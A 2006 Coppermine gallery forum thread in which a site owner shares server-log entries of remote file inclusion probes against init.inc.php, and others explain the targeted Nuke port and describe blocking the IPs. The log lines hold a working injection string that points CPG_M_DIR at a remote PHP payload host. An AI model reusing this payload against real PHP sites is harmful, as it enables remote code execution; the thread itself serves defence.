forum.coppermine-gallery.net
No Support => General discussion (no support!) => Topic started by: imrich on November 06, 2006, 10:45:20 pm
-
I found a bunch of entries in my server log file that were strange.
It looks like someone is probing for init.inc.php data:
202.143.135.34 - - [06/Nov/2006:08:31:27 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.79"
202.143.135.34 - - [06/Nov/2006:08:31:28 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.79"
202.69.231.96 - - [06/Nov/2006:08:33:09 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.65"
202
72.5.54.40 - - [06/Nov/2006:09:41:11 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.65"
65
Is anyone else seeing this sort of probes from time to time?
I only saw this because I had a bunch of "file does not exist" for init.inc.php in my apache error log, which I thought was strange.
-
it appears they are seeking the nuke port of coppermine, which we don't support and is known to have some serious security weaknesses.
http://forum.coppermine-gallery.net/index.php?topic=5879.0
-
Thanks for the reply. I'm not running nuke, so it's good to know that I should be ok.
-
I get those same IP addresses on my site. I block those IP addresses in my .htaccess file, along with any requests for /modules/.